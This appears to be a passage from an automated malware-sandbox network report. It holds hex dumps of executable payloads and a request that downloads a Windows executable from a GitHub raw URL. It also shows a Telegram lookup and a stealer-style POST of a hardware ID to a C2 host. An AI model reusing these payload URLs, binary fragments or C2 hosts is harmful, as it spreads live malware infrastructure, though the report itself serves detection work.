                                                                                                                                                                                                                                                            2024-12-21 21:16:47 UTC1378INData Raw: 4d d8 8d 7d a8 e8 da d5 00 00 0f b7 85 60 ff ff ff 8b 8d 58 ff ff ff 83 ec 20 0f 28 05 c0 f0 41 00 0f 11 44 24 0c 89 44 24 08 89 4c 24 04 89 34 24 c7 44 24 1c 00 00 00 00 ff 15 48 51 63 00 8b 4d ec 85 c0 0f 84 6c 03 00 00 89 c6 89 5d c4 31 c0 85 c9 0f 94 c0 c1 e0 17 0d 00 01 40 00 6a 00 50 6a 00 6a 00 68 53 10 42 00 ff b5 74 ff ff ff 68 f2 0b 42 00 56 89 cb ff 15 58 51 63 00 89 45 f0 85 c0 0f 84 23 03 00 00 89 75 c8 85 db 8d b5 78 f7 ff ff 75 18 c7 85 78 f7 ff ff ff ff ff ff 6a 04 56 6a 1f ff 75 f0 ff 15 68 51 63 00 8d 7d 90 89 f9 68 73 11 42 00 56 e8 36 d6 00 00 89 f9 56 e8 7e d5 00 00 89 f1 e8 17 d5 00 00 89 f9 8d 5d cc 53 56 e8 bb d5 00 00 89 f9 56 e8 63 d5 00 00 89 f1 e8 fc d4 00 00 89 f9 68 05 15 42 00 56 e8 ff d5 00 00 89 f9 56 e8 47 d5 00 00 89 f1
                                                                                                                                                                                                                                                            Data Ascii: M}`X (AD$D$L$4$D$HQcMl]1@jPjjhSBthBVXQcE#uxuxjVjuhQc}hsBV6V~]SVVchBVVG
                                                                                                                                                                                                                                                            2024-12-21 21:16:47 UTC1378INData Raw: fe ff ff 6a 14 56 e8 f7 e1 00 00 8d 9d 6c f6 ff ff 89 f9 56 53 e8 18 d1 00 00 89 f9 53 e8 c0 d0 00 00 89 d9 e8 59 d0 00 00 89 f1 e8 52 d0 00 00 8d bd 78 ff ff ff 8d 4d c8 68 71 11 42 00 57 e8 4e d1 00 00 89 f9 8d 45 a0 50 56 e8 e2 d0 00 00 89 f1 68 dd 14 42 00 53 e8 35 d1 00 00 8d 4d c8 53 e8 7c d0 00 00 89 d9 e8 15 d0 00 00 89 f1 e8 0e d0 00 00 89 f9 e8 07 d0 00 00 8d 7d 90 89 f9 68 40 11 42 00 56 e8 07 d1 00 00 89 f1 8d 45 a0 50 53 e8 9b d0 00 00 89 f9 53 e8 43 d0 00 00 89 d9 8d 5d 08 e8 d9 cf 00 00 89 f1 e8 d2 cf 00 00 0f b7 85 54 ff ff ff 8b 8d 4c ff ff ff 8b 53 04 83 ec 20 0f 28 05 c0 f0 41 00 0f 11 44 24 0c 89 44 24 08 89 4c 24 04 89 14 24 c7 44 24 1c 00 00 00 00 ff 15 48 51 63 00 85 c0 0f 84 ce 05 00 00 89 c6 31 c0 8b 7d ec 85 ff 0f 94 c0 c1 e0 17
                                                                                                                                                                                                                                                            Data Ascii: jVlVSSYRxMhqBWNEPVhBS5MS|}h@BVEPSSC]TLS (AD$D$L$$D$HQc1}
                                                                                                                                                                                                                                                            2024-12-21 21:16:47 UTC1378INData Raw: 31 f6 8b 45 e8 89 45 b4 0f 1f 84 00 00 00 00 00 a1 54 51 63 00 89 45 ec 8b 3d 2c 50 63 00 8d 5d 90 89 d9 e8 f8 cd 00 00 50 ff d7 89 c7 89 d9 e8 ec cd 00 00 ff 75 b0 ff 75 b4 57 50 ff 75 f0 ff 55 ec 85 c0 75 2a 89 c7 68 b8 0b 00 00 ff 15 fc 19 42 00 81 fe 7d 96 98 00 77 05 46 85 ff 74 b0 8d 45 e8 6a 04 50 e8 d5 da 00 00 e9 30 01 00 00 8d 45 e8 6a 04 50 e8 c5 da 00 00 c7 45 ac 00 01 00 00 8d 45 ac 6a 00 50 8d b5 3c fe ff ff 56 6a 13 ff 75 f0 ff 15 64 51 63 00 85 c0 0f 84 fe 00 00 00 56 e8 68 da 00 00 3d c8 00 00 00 0f 85 ed 00 00 00 8d 45 dc 50 68 cf 07 00 00 8d 9d 6c f6 ff ff 53 ff 75 f0 ff 15 5c 51 63 00 85 c0 74 54 8b 45 dc 85 c0 74 4d 8d 75 84 66 0f 1f 44 00 00 c6 84 05 6c f6 ff ff 00 89 f1 53 8d bd 78 ff ff ff 57 e8 39 cb 00 00 89 f1 57 e8 81 ca 00 00
                                                                                                                                                                                                                                                            Data Ascii: 1EETQcE=,Pc]PuuWPuUu*hB}wFtEjP0EjPEEjP<VjudQcVh=EPhlSu\QctTEtMufDlSxW9W
                                                                                                                                                                                                                                                            2024-12-21 21:16:47 UTC1378INData Raw: 89 f1 57 e8 16 c6 00 00 89 f9 e8 af c5 00 00 89 f1 8d 45 b8 50 57 e8 53 c6 00 00 89 f1 57 e8 fb c5 00 00 89 f9 e8 94 c5 00 00 89 f1 68 05 15 42 00 57 e8 97 c6 00 00 89 f1 57 e8 df c5 00 00 89 f9 e8 78 c5 00 00 89 f1 68 09 13 42 00 57 e8 7b c6 00 00 89 f1 57 e8 c3 c5 00 00 89 f9 e8 5c c5 00 00 89 f1 68 8c 09 42 00 57 e8 5f c6 00 00 89 f1 57 e8 a7 c5 00 00 89 f9 e8 40 c5 00 00 89 f1 68 02 15 42 00 57 e8 43 c6 00 00 89 f1 57 e8 8b c5 00 00 89 f9 e8 24 c5 00 00 e8 7f d6 ff ff 89 f1 50 57 e8 26 c6 00 00 89 f1 57 e8 6e c5 00 00 89 f9 e8 07 c5 00 00 89 f1 68 05 15 42 00 57 e8 0a c6 00 00 89 f1 57 e8 52 c5 00 00 89 f9 e8 eb c4 00 00 89 f1 68 73 11 42 00 57 e8 ee c5 00 00 89 f1 57 e8 36 c5 00 00 89 f9 e8 cf c4 00 00 89 f1 8d 45 b8 50 57 e8 73 c5 00 00 89 f1 57 e8
                                                                                                                                                                                                                                                            Data Ascii: WEPWSWhBWWxhBW{W\hBW_W@hBWCW$PW&WnhBWWRhsBWW6EPWsW


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            9192.168.2.449807185.199.110.1334437712C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            2024-12-21 21:16:46 UTC122OUTGET /Urijas/moperats/refs/heads/main/biyjdfjadaw.exe HTTP/1.1
                                                                                                                                                                                                                                                            Host: raw.githubusercontent.com
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            2024-12-21 21:16:47 UTC903INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Content-Length: 1058336
                                                                                                                                                                                                                                                            Cache-Control: max-age=300
                                                                                                                                                                                                                                                            Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                                                                                                                                                            Content-Type: application/octet-stream
                                                                                                                                                                                                                                                            ETag: "02fab045ea6ba15dc6f39ffbdce0ff0b102325b06457bc1e31975f96b1a69b43"
                                                                                                                                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                            X-Frame-Options: deny
                                                                                                                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                            X-GitHub-Request-Id: 7030:3DB155:DD240C:F3CC05:6767303F
                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                            Date: Sat, 21 Dec 2024 21:16:47 GMT
                                                                                                                                                                                                                                                            Via: 1.1 varnish
                                                                                                                                                                                                                                                            X-Served-By: cache-nyc-kteb1890062-NYC
                                                                                                                                                                                                                                                            X-Cache: MISS
                                                                                                                                                                                                                                                            X-Cache-Hits: 0
                                                                                                                                                                                                                                                            X-Timer: S1734815807.005275,VS0,VE147
                                                                                                                                                                                                                                                            Vary: Authorization,Accept-Encoding,Origin
                                                                                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                            Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                                            X-Fastly-Request-ID: 9dae1d22815b203eb8a94fe0bb48bd92a15be513
                                                                                                                                                                                                                                                            Expires: Sat, 21 Dec 2024 21:21:47 GMT
                                                                                                                                                                                                                                                            Source-Age: 0
                                                                                                                                                                                                                                                            2024-12-21 21:16:47 UTC1378INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 77 a5 6d d7 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 8a 0e 00 00 28 01 00 00 00 00 00 9e a8 0e 00 00 20 00 00 00 c0 0e 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 20 10 00 00 02 00 00 c5 c5 10 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                            Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELwm"0( @ `
                                                                                                                                                                                                                                                            2024-12-21 21:16:47 UTC1378INData Raw: 00 00 02 00 00 11 14 72 01 00 00 70 1f 0b 8d 16 00 00 01 25 16 02 7b 38 00 00 0a 0a 12 00 25 71 13 00 00 1b 8c 13 00 00 1b 2d 04 26 14 2b 0b fe 16 13 00 00 1b 6f 65 00 00 0a a2 25 17 02 7b 39 00 00 0a 0b 12 01 25 71 14 00 00 1b 8c 14 00 00 1b 2d 04 26 14 2b 0b fe 16 14 00 00 1b 6f 65 00 00 0a a2 25 18 02 7b 3a 00 00 0a 0c 12 02 25 71 15 00 00 1b 8c 15 00 00 1b 2d 04 26 14 2b 0b fe 16 15 00 00 1b 6f 65 00 00 0a a2 25 19 02 7b 3b 00 00 0a 0d 12 03 25 71 16 00 00 1b 8c 16 00 00 1b 2d 04 26 14 2b 0b fe 16 16 00 00 1b 6f 65 00 00 0a a2 25 1a 02 7b 3c 00 00 0a 13 04 12 04 25 71 17 00 00 1b 8c 17 00 00 1b 2d 04 26 14 2b 0b fe 16 17 00 00 1b 6f 65 00 00 0a a2 25 1b 02 7b 3d 00 00 0a 13 05 12 05 25 71 18 00 00 1b 8c 18 00 00 1b 2d 04 26 14 2b 0b fe 16 18 00 00 1b
                                                                                                                                                                                                                                                            Data Ascii: rp%{8%q-&+oe%{9%q-&+oe%{:%q-&+oe%{;%q-&+oe%{<%q-&+oe%{=%q-&+
                                                                                                                                                                                                                                                            2024-12-21 21:16:47 UTC1378INData Raw: 00 00 0a 6f 59 00 00 0a 39 aa 00 00 00 28 7b 00 00 0a 02 7b 74 00 00 0a 06 7b 74 00 00 0a 6f 7c 00 00 0a 39 8f 00 00 00 28 7d 00 00 0a 02 7b 75 00 00 0a 06 7b 75 00 00 0a 6f 7e 00 00 0a 2c 77 28 7f 00 00 0a 02 7b 76 00 00 0a 06 7b 76 00 00 0a 6f 80 00 00 0a 2c 5f 28 81 00 00 0a 02 7b 77 00 00 0a 06 7b 77 00 00 0a 6f 82 00 00 0a 2c 47 28 83 00 00 0a 02 7b 78 00 00 0a 06 7b 78 00 00 0a 6f 84 00 00 0a 2c 2f 28 85 00 00 0a 02 7b 79 00 00 0a 06 7b 79 00 00 0a 6f 86 00 00 0a 2c 17 28 87 00 00 0a 02 7b 7a 00 00 0a 06 7b 7a 00 00 0a 6f 88 00 00 0a 2a 16 2a 17 2a 00 13 30 03 00 a4 01 00 00 00 00 00 00 20 62 1c ce af 20 29 55 55 a5 5a 28 44 00 00 0a 02 7b 69 00 00 0a 6f 5a 00 00 0a 58 20 29 55 55 a5 5a 28 46 00 00 0a 02 7b 6a 00 00 0a 6f 5b 00 00 0a 58 20 29 55 55
                                                                                                                                                                                                                                                            Data Ascii: oY9({{t{to|9(}{u{uo~,w({v{vo,_({w{wo,G({x{xo,/({y{yo,({z{zo***0 b )UUZ(D{ioZX )UUZ(F{jo[X )UU
                                                                                                                                                                                                                                                            2024-12-21 21:16:47 UTC1378INData Raw: 2d 00 00 1b 6f 65 00 00 0a a2 28 66 00 00 0a 2a 1e 02 7b 90 00 00 0a 2a 1e 02 7b 91 00 00 0a 2a 1e 02 7b 92 00 00 0a 2a 1e 02 7b 93 00 00 0a 2a 1e 02 7b 94 00 00 0a 2a 1e 02 7b 95 00 00 0a 2a 1e 02 7b 96 00 00 0a 2a 1e 02 7b 97 00 00 0a 2a 1e 02 7b 98 00 00 0a 2a 1e 02 7b 99 00 00 0a 2a 1e 02 7b 9a 00 00 0a 2a 1e 02 7b 9b 00 00 0a 2a 1e 02 7b 9c 00 00 0a 2a 1e 02 7b 9d 00 00 0a 2a 1e 02 7b 9e 00 00 0a 2a 1e 02 7b 9f 00 00 0a 2a 00 00 13 30 02 00 84 00 00 00 00 00 00 00 02 28 43 00 00 0a 02 03 7d 90 00 00 0a 02 04 7d 91 00 00 0a 02 05 7d 92 00 00 0a 02 0e 04 7d 93 00 00 0a 02 0e 05 7d 94 00 00 0a 02 0e 06 7d 95 00 00 0a 02 0e 07 7d 96 00 00 0a 02 0e 08 7d 97 00 00 0a 02 0e 09 7d 98 00 00 0a 02 0e 0a 7d 99 00 00 0a 02 0e 0b 7d 9a 00 00 0a 02 0e 0c 7d 9b 00
                                                                                                                                                                                                                                                            Data Ascii: -oe(f*{*{*{*{*{*{*{*{*{*{*{*{*{*{*{*{*0(C}}}}}}}}}}}}
                                                                                                                                                                                                                                                            2024-12-21 21:16:47 UTC1378INData Raw: 1b 2d 04 26 14 2b 0b fe 16 18 00 00 1b 6f 65 00 00 0a a2 25 1c 02 7b 96 00 00 0a 13 06 12 06 25 71 19 00 00 1b 8c 19 00 00 1b 2d 04 26 14 2b 0b fe 16 19 00 00 1b 6f 65 00 00 0a a2 25 1d 02 7b 97 00 00 0a 13 07 12 07 25 71 1a 00 00 1b 8c 1a 00 00 1b 2d 04 26 14 2b 0b fe 16 1a 00 00 1b 6f 65 00 00 0a a2 25 1e 02 7b 98 00 00 0a 13 08 12 08 25 71 1b 00 00 1b 8c 1b 00 00 1b 2d 04 26 14 2b 0b fe 16 1b 00 00 1b 6f 65 00 00 0a a2 25 1f 09 02 7b 99 00 00 0a 13 09 12 09 25 71 1c 00 00 1b 8c 1c 00 00 1b 2d 04 26 14 2b 0b fe 16 1c 00 00 1b 6f 65 00 00 0a a2 25 1f 0a 02 7b 9a 00 00 0a 13 0a 12 0a 25 71 1d 00 00 1b 8c 1d 00 00 1b 2d 04 26 14 2b 0b fe 16 1d 00 00 1b 6f 65 00 00 0a a2 25 1f 0b 02 7b 9b 00 00 0a 13 0b 12 0b 25 71 27 00 00 1b 8c 27 00 00 1b 2d 04 26 14 2b
                                                                                                                                                                                                                                                            Data Ascii: -&+oe%{%q-&+oe%{%q-&+oe%{%q-&+oe%{%q-&+oe%{%q-&+oe%{%q''-&+
                                                                                                                                                                                                                                                            2024-12-21 21:16:47 UTC1378INData Raw: 58 00 00 0a 02 7b aa 00 00 0a 6f 64 00 00 0a 58 20 29 55 55 a5 5a 28 7b 00 00 0a 02 7b ab 00 00 0a 6f 89 00 00 0a 58 20 29 55 55 a5 5a 28 7d 00 00 0a 02 7b ac 00 00 0a 6f 8a 00 00 0a 58 20 29 55 55 a5 5a 28 7f 00 00 0a 02 7b ad 00 00 0a 6f 8b 00 00 0a 58 20 29 55 55 a5 5a 28 81 00 00 0a 02 7b ae 00 00 0a 6f 8c 00 00 0a 58 2a 00 13 30 07 00 7c 02 00 00 0a 00 00 11 14 72 f8 06 00 70 1f 0f 8d 16 00 00 01 25 16 02 7b a0 00 00 0a 0a 12 00 25 71 13 00 00 1b 8c 13 00 00 1b 2d 04 26 14 2b 0b fe 16 13 00 00 1b 6f 65 00 00 0a a2 25 17 02 7b a1 00 00 0a 0b 12 01 25 71 14 00 00 1b 8c 14 00 00 1b 2d 04 26 14 2b 0b fe 16 14 00 00 1b 6f 65 00 00 0a a2 25 18 02 7b a2 00 00 0a 0c 12 02 25 71 15 00 00 1b 8c 15 00 00 1b 2d 04 26 14 2b 0b fe 16 15 00 00 1b 6f 65 00 00 0a a2
                                                                                                                                                                                                                                                            Data Ascii: X{odX )UUZ({{oX )UUZ(}{oX )UUZ({oX )UUZ({oX*0|rp%{%q-&+oe%{%q-&+oe%{%q-&+oe
                                                                                                                                                                                                                                                            2024-12-21 21:16:47 UTC1378INData Raw: 7b bc 00 00 0a 6f 80 00 00 0a 2a 16 2a 17 2a 00 13 30 03 00 48 01 00 00 00 00 00 00 20 60 2d a1 83 20 29 55 55 a5 5a 28 44 00 00 0a 02 7b af 00 00 0a 6f 5a 00 00 0a 58 20 29 55 55 a5 5a 28 46 00 00 0a 02 7b b0 00 00 0a 6f 5b 00 00 0a 58 20 29 55 55 a5 5a 28 48 00 00 0a 02 7b b1 00 00 0a 6f 5c 00 00 0a 58 20 29 55 55 a5 5a 28 4a 00 00 0a 02 7b b2 00 00 0a 6f 5d 00 00 0a 58 20 29 55 55 a5 5a 28 4c 00 00 0a 02 7b b3 00 00 0a 6f 5e 00 00 0a 58 20 29 55 55 a5 5a 28 4e 00 00 0a 02 7b b4 00 00 0a 6f 5f 00 00 0a 58 20 29 55 55 a5 5a 28 50 00 00 0a 02 7b b5 00 00 0a 6f 60 00 00 0a 58 20 29 55 55 a5 5a 28 52 00 00 0a 02 7b b6 00 00 0a 6f 61 00 00 0a 58 20 29 55 55 a5 5a 28 54 00 00 0a 02 7b b7 00 00 0a 6f 62 00 00 0a 58 20 29 55 55 a5 5a 28 56 00 00 0a 02 7b b8 00
                                                                                                                                                                                                                                                            Data Ascii: {o***0H `- )UUZ(D{oZX )UUZ(F{o[X )UUZ(H{o\X )UUZ(J{o]X )UUZ(L{o^X )UUZ(N{o_X )UUZ(P{o`X )UUZ(R{oaX )UUZ(T{obX )UUZ(V{
                                                                                                                                                                                                                                                            2024-12-21 21:16:47 UTC1378INData Raw: 55 55 a5 5a 28 4e 00 00 0a 02 7b c2 00 00 0a 6f 5f 00 00 0a 58 2a 13 30 07 00 04 01 00 00 0e 00 00 11 14 72 42 0b 00 70 1c 8d 16 00 00 01 25 16 02 7b bd 00 00 0a 0a 12 00 25 71 13 00 00 1b 8c 13 00 00 1b 2d 04 26 14 2b 0b fe 16 13 00 00 1b 6f 65 00 00 0a a2 25 17 02 7b be 00 00 0a 0b 12 01 25 71 14 00 00 1b 8c 14 00 00 1b 2d 04 26 14 2b 0b fe 16 14 00 00 1b 6f 65 00 00 0a a2 25 18 02 7b bf 00 00 0a 0c 12 02 25 71 15 00 00 1b 8c 15 00 00 1b 2d 04 26 14 2b 0b fe 16 15 00 00 1b 6f 65 00 00 0a a2 25 19 02 7b c0 00 00 0a 0d 12 03 25 71 16 00 00 1b 8c 16 00 00 1b 2d 04 26 14 2b 0b fe 16 16 00 00 1b 6f 65 00 00 0a a2 25 1a 02 7b c1 00 00 0a 13 04 12 04 25 71 17 00 00 1b 8c 17 00 00 1b 2d 04 26 14 2b 0b fe 16 17 00 00 1b 6f 65 00 00 0a a2 25 1b 02 7b c2 00 00 0a
                                                                                                                                                                                                                                                            Data Ascii: UUZ(N{o_X*0rBp%{%q-&+oe%{%q-&+oe%{%q-&+oe%{%q-&+oe%{%q-&+oe%{
                                                                                                                                                                                                                                                            2024-12-21 21:16:47 UTC1378INData Raw: 7b c5 00 00 0a 0c 12 02 25 71 15 00 00 1b 8c 15 00 00 1b 2d 04 26 14 2b 0b fe 16 15 00 00 1b 6f 65 00 00 0a a2 25 19 02 7b c6 00 00 0a 0d 12 03 25 71 16 00 00 1b 8c 16 00 00 1b 2d 04 26 14 2b 0b fe 16 16 00 00 1b 6f 65 00 00 0a a2 25 1a 02 7b c7 00 00 0a 13 04 12 04 25 71 17 00 00 1b 8c 17 00 00 1b 2d 04 26 14 2b 0b fe 16 17 00 00 1b 6f 65 00 00 0a a2 25 1b 02 7b c8 00 00 0a 13 05 12 05 25 71 18 00 00 1b 8c 18 00 00 1b 2d 04 26 14 2b 0b fe 16 18 00 00 1b 6f 65 00 00 0a a2 25 1c 02 7b c9 00 00 0a 13 06 12 06 25 71 19 00 00 1b 8c 19 00 00 1b 2d 04 26 14 2b 0b fe 16 19 00 00 1b 6f 65 00 00 0a a2 25 1d 02 7b ca 00 00 0a 13 07 12 07 25 71 1a 00 00 1b 8c 1a 00 00 1b 2d 04 26 14 2b 0b fe 16 1a 00 00 1b 6f 65 00 00 0a a2 25 1e 02 7b cb 00 00 0a 13 08 12 08 25 71
                                                                                                                                                                                                                                                            Data Ascii: {%q-&+oe%{%q-&+oe%{%q-&+oe%{%q-&+oe%{%q-&+oe%{%q-&+oe%{%q
                                                                                                                                                                                                                                                            2024-12-21 21:16:47 UTC1378INData Raw: 63 00 00 0a 58 20 29 55 55 a5 5a 28 58 00 00 0a 02 7b db 00 00 0a 6f 64 00 00 0a 58 20 29 55 55 a5 5a 28 7b 00 00 0a 02 7b dc 00 00 0a 6f 89 00 00 0a 58 20 29 55 55 a5 5a 28 7d 00 00 0a 02 7b dd 00 00 0a 6f 8a 00 00 0a 58 20 29 55 55 a5 5a 28 7f 00 00 0a 02 7b de 00 00 0a 6f 8b 00 00 0a 58 2a 13 30 07 00 52 02 00 00 0c 00 00 11 14 72 58 0e 00 70 1f 0e 8d 16 00 00 01 25 16 02 7b d1 00 00 0a 0a 12 00 25 71 13 00 00 1b 8c 13 00 00 1b 2d 04 26 14 2b 0b fe 16 13 00 00 1b 6f 65 00 00 0a a2 25 17 02 7b d2 00 00 0a 0b 12 01 25 71 14 00 00 1b 8c 14 00 00 1b 2d 04 26 14 2b 0b fe 16 14 00 00 1b 6f 65 00 00 0a a2 25 18 02 7b d3 00 00 0a 0c 12 02 25 71 15 00 00 1b 8c 15 00 00 1b 2d 04 26 14 2b 0b fe 16 15 00 00 1b 6f 65 00 00 0a a2 25 19 02 7b d4 00 00 0a 0d 12 03 25
                                                                                                                                                                                                                                                            Data Ascii: cX )UUZ(X{odX )UUZ({{oX )UUZ(}{oX )UUZ({oX*0RrXp%{%q-&+oe%{%q-&+oe%{%q-&+oe%{%


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            10192.168.2.449810149.154.167.994432792C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            2024-12-21 21:16:52 UTC85OUTGET /k04ael HTTP/1.1
                                                                                                                                                                                                                                                            Host: t.me
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                            2024-12-21 21:16:52 UTC511INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Server: nginx/1.18.0
                                                                                                                                                                                                                                                            Date: Sat, 21 Dec 2024 21:16:52 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                            Content-Length: 12295
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Set-Cookie: stel_ssid=75d187e0a3c2725dbe_8424009189036625064; expires=Sun, 22 Dec 2024 21:16:52 GMT; path=/; samesite=None; secure; HttpOnly
                                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                                            Cache-control: no-store
                                                                                                                                                                                                                                                            X-Frame-Options: ALLOW-FROM https://web.telegram.org
                                                                                                                                                                                                                                                            Content-Security-Policy: frame-ancestors https://web.telegram.org
                                                                                                                                                                                                                                                            Strict-Transport-Security: max-age=35768000
                                                                                                                                                                                                                                                            2024-12-21 21:16:52 UTC12295INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 54 65 6c 65 67 72 61 6d 3a 20 43 6f 6e 74 61 63 74 20 40 6b 30 34 61 65 6c 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 74 72 79 7b 69 66 28 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 21 3d 6e 75 6c 6c 26 26 77 69 6e 64 6f 77 21 3d 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 29 7b 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74
                                                                                                                                                                                                                                                            Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <title>Telegram: Contact @k04ael</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <script>try{if(window.parent!=null&&window!=window.parent){window.parent


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            11192.168.2.449811172.67.209.2024437908C:\Users\user\AppData\Local\Temp\1019664001\85746525a0.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            2024-12-21 21:16:52 UTC283OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=9GN13MIENJ57TTXVU
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                            Content-Length: 1315
                                                                                                                                                                                                                                                            Host: pancakedipyps.click
                                                                                                                                                                                                                                                            2024-12-21 21:16:52 UTC1315OUTData Raw: 2d 2d 39 47 4e 31 33 4d 49 45 4e 4a 35 37 54 54 58 56 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 43 42 46 37 41 44 32 31 46 43 39 39 30 44 34 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 39 47 4e 31 33 4d 49 45 4e 4a 35 37 54 54 58 56 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 39 47 4e 31 33 4d 49 45 4e 4a 35 37 54 54 58 56 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 46 41 54 45 39 39 2d 2d 74 65 73 74 0d 0a 2d 2d
                                                                                                                                                                                                                                                            Data Ascii: --9GN13MIENJ57TTXVUContent-Disposition: form-data; name="hwid"ACBF7AD21FC990D4AC8923850305D13E--9GN13MIENJ57TTXVUContent-Disposition: form-data; name="pid"1--9GN13MIENJ57TTXVUContent-Disposition: form-data; name="lid"FATE99--test--
                                                                                                                                                                                                                                                            2024-12-21 21:16:53 UTC1131INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Sat, 21 Dec 2024 21:16:53 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Set-Cookie: PHPSESSID=f8japjsnh1g2p9lqchqp7sfmee; expires=Wed, 16 Apr 2025 15:03:31 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                            vary: accept-encoding
                                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AxsuLWTsXsz3u29m3gcEOP1brNkeOFDWGUmeu%2BBwlKVh0EXjas89W0%2FrEeJ37MhZAiFsLL1UIvS%2B%2Fi8KM512fmDHtTKuxn3cI8V8%2FJsDtD3wg3SZEE5kdhUFQbeztuuLTezAHiCZ"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            CF-RAY: 8f5ae54bee4f438b-EWR
                                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
